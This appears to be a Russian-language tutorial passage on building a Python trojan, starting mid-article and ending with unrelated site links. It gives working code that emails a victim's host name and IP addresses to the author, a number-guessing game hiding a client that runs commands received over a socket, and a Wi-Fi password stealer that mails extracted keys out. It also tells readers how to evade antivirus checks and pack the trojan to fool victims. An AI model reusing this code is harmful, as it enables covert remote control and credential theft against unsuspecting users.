
print(f‘Публичный IP: {public_ip}’)

Ни­ког­да не встре­чал конс­трук­ции типа
print(<wbr />f‘{}<wbr />’)? Бук­ва
f озна­чает фор­матиро­ван­ные стро­ковые литера­лы. А по простому — прог­рам­мные встав­ки пря­мо в стро­ку.


Стро­ковые литера­лы не толь­ко хорошо смот­рятся в коде, но и помога­ют избе­гать оши­бок типа сло­жения строк и чисел (Python — это вам на JavaScript!).

Фи­наль­ный код:

import socket

from requests import get

hostname = socket.gethostname()

local_ip = socket.gethostbyname(hostname)

public_ip = get(‘http://api.ipify.org’).text

print(f‘Хост: {hostname}’)

print(f‘Локальный IP: {local_ip}’)

print(f‘Публичный IP: {public_ip}’)

За­пус­тив этот скрипт, мы смо­жем опре­делить IP-адрес нашего (или чужого) компь­юте­ра.

Бэкконнект по почте

Те­перь напишем скрипт, который будет при­сылать нам пись­мо.

Им­порт новых биб­лиотек (обе нуж­но пред­варитель­но пос­тавить через
pip <wbr />install):

import smtplib as smtp

from getpass import getpass

Пи­шем базовую информа­цию о себе:

# Почта, с которой будет отправлено письмо

email = ‘demo@spy-soft.net’

# Пароль от нее (вместо ***)

password = ‘***’

# Почта, на которую отправляем письмо

dest_email = ‘demo@spy-soft.net’

# Тема письма

subject = ‘IP’

# Текст письма

email_text = ‘TEXT’

Даль­ше сфор­миру­ем пись­мо:

message = ‘From: {}nTo: {}nSubject: {}nn{}’.format(email, dest_email, subject, email_text)

Пос­ледний штрих — нас­тро­ить под­клю­чение к поч­товому сер­вису. Я поль­зуюсь Яндекс.Поч­той, поэто­му нас­трой­ки выс­тавлял для нее.

server = smtp.SMTP_SSL(‘smtp.yandex.com’) # SMTP-сервер Яндекса

server.set_debuglevel(1) # Минимизируем вывод ошибок (выводим только фатальные ошибки)

server.ehlo(email) # Отправляем hello-пакет на сервер

server.login(email, password) # Заходим на почту, с которой будем отправлять письмо

server.auth_plain() # Авторизуемся

server.sendmail(email, dest_email, message) # Вводим данные для отправки (адреса свой и получателя и само сообщение)

server.quit() # Отключаемся от сервера

В стро­ке
server.<wbr />ehlo(<wbr />email) мы исполь­зуем коман­ду
EHLO. Боль­шинс­тво сер­веров SMTP под­держи­вают
ESMTP и 
EHLO. Если сер­вер, к которо­му вы пыта­етесь под­клю­чить­ся, не под­держи­вает
EHLO, мож­но исполь­зовать
HELO.

Пол­ный код этой час­ти тро­яна:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

import smtplib as smtp

import socket

from getpass import getpass

from requests import get

hostname = socket.gethostname()

local_ip = socket.gethostbyname(hostname)

public_ip = get(‘http://api.ipify.org’).text

email = ‘demo@spy-soft.net’

password = ‘***’

dest_email = ‘demo@spy-soft.net’

subject = ‘IP’

email_text = (f‘Host: {hostname}nLocal IP: {local_ip}nPublic IP: {public_ip}’)

message = ‘From: {}nTo: {}nSubject: {}nn{}’.format(email, dest_email, subject, email_text)

server = smtp.SMTP_SSL(‘smtp.yandex.com’)

server.set_debuglevel(1)

server.ehlo(email)

server.login(email, password)

server.auth_plain()

server.sendmail(email, dest_email, message)

server.quit()

После запуска скрипта, получа­ем пись­мо.

Пись­мо с IP жертвы

Пись­мо с IP

Этот скрипт я про­верил на VirusTotal. Резуль­тат на скри­не.

Написание трояна на Python

Создание трояна на Python

По задум­ке, тро­ян пред­став­ляет собой кли­ент‑сер­верное при­ложе­ние с кли­ентом на машине ата­куемо­го и сер­вером на запус­кающей машине. Дол­жен быть реали­зован мак­сималь­ный уда­лен­ный дос­туп к сис­теме.

Как обыч­но, нач­нем с биб­лиотек:

import random

import socket

import threading

import os

Для начала напишем игру «Уга­дай чис­ло». Тут все край­не прос­то, поэто­му задер­живать­ся дол­го не буду.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

# Создаем функцию игры

def game():

    # Берем случайное число от 0 до 1000

    number = random.randint(0, 1000)

    # Счетчик попыток

    tries = 1

    # Флаг завершения игры

    done = False

    # Пока игра не закончена, просим ввести новое число

    while not done:

        guess = input(‘Введите число: ‘)

        # Если ввели число

        if guess.isdigit():

            # Конвертируем его в целое

            guess = int(guess)

            # Проверяем, совпало ли оно с загаданным; если да, опускаем флаг и пишем сообщение о победе

            if guess == number:

                done = True

                print(f‘Ты победил! Я загадал {guess}. Ты использовал {tries} попыток.’)

            # Если же мы не угадали, прибавляем попытку и проверяем число на больше/меньше

            else:

                tries += 1

                if guess > number:

                    print(‘Загаданное число меньше!’)

                else:

                    print(‘Загаданное число больше!’)

        # Если ввели не число — выводим сообщение об ошибке и просим ввести число заново

        else:

            print(‘Это не число от 0 до 1000!’)


За­чем столь­ко слож­ностей с про­вер­кой на чис­ло? Мож­но было прос­то написать:

guess <wbr />= <wbr />int(<wbr />input(<wbr />‘Введите <wbr />число: <wbr />’)<wbr />)

Если бы мы написа­ли так, то при вво­де чего угод­но, кро­ме чис­ла, выпада­ла бы ошиб­ка, а это­го допус­тить нель­зя, так как ошиб­ка зас­тавит прог­рамму оста­новить­ся и обру­бит соеди­нение.

Вот код нашего тро­яна. Ниже мы будем раз­бирать­ся, как он работа­ет, что­бы не про­гова­ривать заново базовые вещи.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

# Создаем функцию трояна

def trojan():

    # IP-адрес атакуемого

    HOST = ‘192.168.2.112’

    # Порт, по которому мы работаем

    PORT = 9090

    # Создаем эхо-сервер

    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    client.connect((HOST, PORT))

    while True:

        # Вводим команду серверу

        server_command = client.recv(1024).decode(‘cp866’)

        # Если команда совпала с ключевым словом ‘cmdon’, запускаем режим работы с терминалом

        if server_command == ‘cmdon’:

            cmd_mode = True

            # Отправляем информацию на сервер

            client.send(‘Получен доступ к терминалу’.encode(‘cp866’))

            continue

        # Если команда совпала с ключевым словом ‘cmdoff’, выходим из режима работы с терминалом

        if server_command == ‘cmdoff’:

            cmd_mode = False

        # Если запущен режим работы с терминалом, вводим команду в терминал через сервер

        if cmd_mode:

            os.popen(server_command)

        # Если же режим работы с терминалом выключен — можно вводить любые команды

        else:

            if server_command == ‘hello’:

                print(‘Hello World!’)

        # Если команда дошла до клиента — выслать ответ

        client.send(f‘{server_command} успешно отправлена!’.encode(‘cp866’))

Сна­чала нуж­но разоб­рать­ся, что такое сокет и с чем его едят. Сокет прос­тым язы­ком — это условная вил­ка или розет­ка для прог­рамм. Сущес­тву­ют кли­ент­ские и сер­верные сокеты: сер­верный прос­лушива­ет опре­делен­ный порт (розет­ка), а кли­ент­ский под­клю­чает­ся к сер­веру (вил­ка). Пос­ле того как уста­нов­лено соеди­нение, начина­ется обмен дан­ными.

Следующая стро­ка:

client <wbr />= <wbr />socket.<wbr />socket(<wbr />socket.<wbr />AF_INET, <wbr />socket.<wbr />SOCK_STREAM)

соз­дает эхо‑сер­вер (отпра­вили зап­рос — получи­ли ответ).
AF_INET озна­чает работу с IPv4-адре­саци­ей, а 
SOCK_STREAM ука­зыва­ет на то, что мы исполь­зуем TCP-под­клю­чение вмес­то UDP, где пакет посыла­ется в сеть и далее не отсле­жива­ется.

Стро­ка:

client.<wbr />connect((<wbr />HOST, <wbr />PORT)<wbr />)

ука­зыва­ет IP-адрес хос­та и порт, по которым будет про­изво­дить­ся под­клю­чение, и сра­зу под­клю­чает­ся.

Фун­кция
client.<wbr />recv(<wbr />1024) при­нима­ет дан­ные из сокета и явля­ется так называ­емым «бло­киру­ющим вызовом». Смысл такого вызова в том, что, пока коман­да не передас­тся или не будет отвер­гну­та дру­гой сто­роной, вызов будет про­дол­жать выпол­нять­ся. 1024 — это количес­тво задей­ство­ван­ных бай­тов под буфер при­ема.

Нель­зя будет при­нять боль­ше 1024 байт (1 Кбайт) за один раз, но нам это и не нуж­но: час­то вы руками вво­дите в кон­соль боль­ше 1000 сим­волов? Пытать­ся мно­гок­ратно уве­личить раз­мер буфера не нуж­но — это зат­ратно и бес­полез­но, так как нужен боль­шой буфер при­мер­но раз в никог­да.

Ко­ман­да
decode(<wbr />‘cp866’) декоди­рует получен­ный бай­товый буфер в тек­сто­вую стро­ку сог­ласно задан­ной кодиров­ке (у нас 866). Но почему имен­но
cp866? Зай­дем в коман­дную стро­ку и вве­дем коман­ду
chcp.

Те­кущая кодовая стра­ница

Те­кущая кодовая стра­ница

Ко­диров­ка по умол­чанию для рус­ско­гово­рящих устрой­ств — 866, где кирил­лица добав­лена в латини­цу. В англо­языч­ных вер­сиях сис­темы исполь­зует­ся обыч­ный Unicode, то есть
utf8 в Python. Мы же говорим на рус­ском язы­ке, так что под­держи­вать его нам прос­то необ­ходимо.


При желании кодиров­ку мож­но поменять в коман­дной стро­ке, наб­рав пос­ле
chcp ее номер. Юни­код име­ет номер 65001.

При при­еме коман­ды нуж­но опре­делить, не слу­жеб­ная ли она. Если так, выпол­няем опре­делен­ные дей­ствия, ина­че, если вклю­чен тер­минал, перенап­равля­ем коман­ду туда. Недос­таток — резуль­тат выпол­нения так и оста­ется необ­работан­ным, а его хорошо бы отправ­лять нам. Это будет вам домаш­ним задани­ем: реали­зовать эту фун­кцию мож­но от силы минут за пят­надцать, даже если гуг­лить каж­дый шаг.

Ре­зуль­тат про­вер­ки кли­ента на VirusTotal порадо­вал.

Создание трояна на Питон

Ба­зовый тро­ян написан, и сей­час мож­но сде­лать очень мно­гое на машине ата­куемо­го, ведь у нас дос­туп к коман­дной стро­ке. Но почему бы нам не рас­ширить набор фун­кций? Давайте еще пароли от WiFi!

Создание WiFi-стилера на Python

За­дача — соз­дать скрипт, который из коман­дной стро­ки узна­ет все пароли от дос­тупных сетей Wi-Fi.

Прис­тупа­ем. Импорт биб­лиотек:

import subprocess

import time

Мо­дуль
subprocess нужен для соз­дания новых про­цес­сов и соеди­нения с потока­ми стан­дар­тно­го вво­да‑вывода, а еще для получе­ния кодов воз­вра­та от этих про­цес­сов.

Итак, скрипт для извле­чения паролей WiFi:

# Создаем запрос в командной строке netsh wlan show profiles, декодируя его по кодировке в самом ядре

data = subprocess.check_output([‘netsh’, ‘wlan’, ‘show’, ‘profiles’]).decode(‘cp866’).split(‘n’)

# Создаем список всех названий всех профилей сети (имена сетей)

WiFis = [line.split(‘:’)[1][1:1] for line in data if «Все профили пользователей» in line]

# Для каждого имени…

for WiFi in WiFis:

    # …вводим запрос netsh wlan show profile [ИМЯ_Сети] key=clear

    results = subprocess.check_output([‘netsh’, ‘wlan’, ‘show’, ‘profile’, WiFi, ‘key=clear’]).decode(‘cp866’).split(‘n’)

    # Забираем ключ

    results = [line.split(‘:’)[1][1:1] for line in results if «Содержимое ключа» in line]

    # Пытаемся его вывести в командной строке, отсекая все ошибки

    try:

        print(f‘Имя сети: {Wi-Fi}, Пароль: {results[0]}’)

    except IndexError:

        print(f‘Имя сети: {Wi-Fi}, Пароль не найден!’)

Вве­дя коман­ду в коман­дной стро­ке:

netsh <wbr />wlan <wbr />show <wbr />profiles

Mы получим сле­дующее.

netsh wlan show profiles

netsh wlan show profiles

Ес­ли рас­парсить вывод выше и под­ста­вить имя сети в коман­ду:

netsh <wbr />wlan <wbr />show <wbr />profile [<wbr />имя <wbr />сети] <wbr />key=clear

Резуль­тат будет как на кар­тинке. Его мож­но разоб­рать и вытащить пароль от сети.

netsh wlan show profile ASUS key=clear

netsh wlan show profile ASUS key=clear
RAT Python. Результат VirusTotal
Результат VirusTotal

Ос­талась одна проб­лема: наша изна­чаль­ная задум­ка была заб­рать пароли себе, а не показы­вать их поль­зовате­лю. Испра­вим же это.

До­пишем еще один вари­ант коман­ды в скрипт, где обра­баты­ваем наши коман­ды из сети.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

if server_command == ‘Wi-Fi’:

    data = subprocess.check_output([‘netsh’, ‘wlan’, ‘show’, ‘profiles’]).decode(‘cp866’).split(‘n’)

    WiFis = [line.split(‘:’)[1][1:1] for line in data if «Все профили пользователей» in line]

    for WiFi in WiFis:

        results = subprocess.check_output([‘netsh’, ‘wlan’, ‘show’, ‘profile’, WiFi, ‘key=clear’]).decode(‘cp866’).split(‘n’)

        results = [line.split(‘:’)[1][1:1] for line in results if «Содержимое ключа» in line]

        try:

            email = ‘mail@yandex.ru’

            password = ‘***’

            dest_email = ‘demo@demo.ru’

            subject = ‘Wi-Fi’

            email_text = (f‘Name: {Wi-Fi}, Password: {results[0]}’)

            message = ‘From: {}nTo: {}nSubject: {}nn{}’.format(email, dest_email, subject, email_text)

            server = smtp.SMTP_SSL(‘smtp.yandex.com’)

            server.set_debuglevel(1)

            server.ehlo(email)

            server.login(email, password)

            server.auth_plain()

            server.sendmail(email, dest_email, message)

            server.quit()

        except IndexError:

            email = ‘mail@yandex.ru’

            password = ‘***’

            dest_email = ‘demo@demo.ru’

            subject = ‘Wi-Fi’

            email_text = (f‘Name: {Wi-Fi}, Password not found!’)

            message = ‘From: {}nTo: {}nSubject: {}nn{}’.format(email, dest_email, subject, email_text)

            server = smtp.SMTP_SSL(‘smtp.yandex.com’)

            server.set_debuglevel(1)

            server.ehlo(email)

            server.login(email, password)

            server.auth_plain()

            server.sendmail(email, dest_email, message)

            server.quit()


Этот скрипт прост как два руб­ля и ожи­дает уви­деть рус­ско­языч­ную сис­тему. На дру­гих язы­ках это не сра­бота­ет, но испра­вить поведе­ние скрип­та мож­но прос­тым выбором раз­делите­ля из сло­варя, где ключ — обна­ружен­ный на компь­юте­ре язык, а зна­чение — тре­буемая фра­за на нуж­ном язы­ке.

Все коман­ды это­го скрип­та уже под­робно разоб­раны, так что я не буду пов­торять­ся, а прос­то покажу скрин­шот из сво­ей поч­ты.

Троян на Python отработал

Троян на Python отработал

Доработки

Ко­неч­но, тут мож­но дорабо­тать при­мер­но все — от защиты канала переда­чи до защиты самого кода нашего вре­доно­са. Методы свя­зи с управля­ющи­ми сер­верами зло­умыш­ленни­ка тоже обыч­но исполь­зуют­ся дру­гие, а работа вре­доно­са не зависит от язы­ка опе­раци­онной сис­темы.

И конеч­но, сам троян очень желатель­но упа­ковать с помощью PyInstaller, что­бы не тянуть с собой на машину жер­твы питон и все зависи­мос­ти. Игра, которая тре­бует для работы уста­новить модуль для работы с поч­той, — что может боль­ше вну­шать доверие?

Заключение

Се­год­няшний тро­ян нас­толь­ко прост, что его никак нель­зя наз­вать боевым. Тем не менее он полезен для изу­чения основ язы­ка Python и понима­ния алго­рит­мов работы более слож­ных вре­донос­ных прог­рамм. Мы наде­емся, что вы ува­жаете закон, а получен­ные зна­ния о тро­янах вам никог­да не понадо­бят­ся.

В качес­тве домаш­него задания рекомен­дую поп­робовать реали­зовать двус­торон­ний тер­минал и шиф­рование дан­ных хотя бы с помощью XOR. Такой тро­ян уже будет куда инте­рес­нее, но, безус­ловно, исполь­зовать его in the wild мы не при­зыва­ем. Будьте акку­ратны и не делайте глупостей!

Еще по теме: Как создать троян для Android

Понравилась статья? Поделить с друзьями:
  • Как написать ученику докладную на ученика
  • Как написать топик на фасткапе
  • Как написать ученикам докладную на учителя
  • Как написать то что работа не подходит
  • Как написать ученик на английском